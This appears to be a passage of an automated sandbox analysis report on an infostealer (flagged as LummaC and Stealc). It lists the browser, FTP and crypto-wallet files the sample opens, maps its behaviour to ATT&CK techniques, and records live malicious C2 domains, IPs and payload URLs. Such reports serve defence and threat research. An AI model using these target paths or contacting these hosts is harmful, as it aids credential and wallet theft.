Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZSSZYEFYMU	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7508, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.64b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1627798849.00000000064B1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1564217264.00000000088F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	2 OS Credential Dumping	751 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	34 Virtualization/Sandbox Evasion	LSASS Memory	34 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://navygenerayk.store/apik	100%	Avira URL Cloud	malware
https://navygenerayk.store/g	100%	Avira URL Cloud	malware
http://185.215.113.206/sd	100%	Avira URL Cloud	malware
https://navygenerayk.store/w	100%	Avira URL Cloud	malware
http://185.215.113.16/ekT	100%	Avira URL Cloud	phishing
http://185.215.113.206/tdg	100%	Avira URL Cloud	malware
https://navygenerayk.store/Wi	100%	Avira URL Cloud	malware
https://navygenerayk.store/c	100%	Avira URL Cloud	malware
https://navygenerayk.store/apih	100%	Avira URL Cloud	malware
https://navygenerayk.store/KU	100%	Avira URL Cloud	malware
http://185.215.113.16/Tk	100%	Avira URL Cloud	phishing
https://navygenerayk.store/apiF	100%	Avira URL Cloud	malware
http://185.215.113.206/mandconnroutehelper.dll	100%	Avira URL Cloud	malware
https://navygenerayk.store/o	100%	Avira URL Cloud	malware
https://navygenerayk.store/0	100%	Avira URL Cloud	malware
https://navygenerayk.store/7	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exe4	100%	Avira URL Cloud	phishing
http://185.215.113.16/off/def.exeC	100%	Avira URL Cloud	phishing
http://185.215.113.16/~k	100%	Avira URL Cloud	phishing
http://185.215.113.206/rosoft	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.fb-t-msedge.net	13.107.253.45	true	false	high
navygenerayk.store	188.114.97.3	true	false	high
presticitpo.store	unknown	unknown	false	high
founpiuer.store	unknown	unknown	false	high
thumbystriw.store	unknown	unknown	false	high
necklacedmny.store	unknown	unknown	false	high
crisiwarny.store	unknown	unknown	false	high
fadehairucw.store	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/	false	high
presticitpo.store	false	high
necklacedmny.store	false	high
fadehairucw.store	false	high
http://185.215.113.206/6c4adf523b719729.php	false	high
https://navygenerayk.store/api	false	high
founpiuer.store	false	high
crisiwarny.store	false	high
scriptyprefej.store	false	high
navygenerayk.store	false	high
thumbystriw.store	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navygenerayk.store/o	file.exe, 00000000.00000003.1396415390.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://navygenerayk.store/apik	file.exe, 00000000.00000003.1432239221.0000000001423000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navygenerayk.store/g	file.exe, 00000000.00000003.1396415390.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/sd	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://navygenerayk.store/c	file.exe, 00000000.00000003.1482150214.0000000001439000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557590964.0000000001439000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557796581.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1625467366.000000000142E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1482231614.000000000143B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.rs/getrandom#nodejs-es-module-support	file.exe, 00000000.00000003.1564217264.000000000891B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1627798849.00000000064DC000.00000040.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/tdg	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/ekT	file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/6c4adf523b719729.phpp	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5	file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store/w	file.exe, 00000000.00000003.1410085886.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410739039.0000000005C7A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1411774081.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://navygenerayk.store/apih	file.exe, 00000000.00000003.1432832517.0000000001417000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navygenerayk.store/Wi	file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/6c4adf523b719729.phph	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/Tk	file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
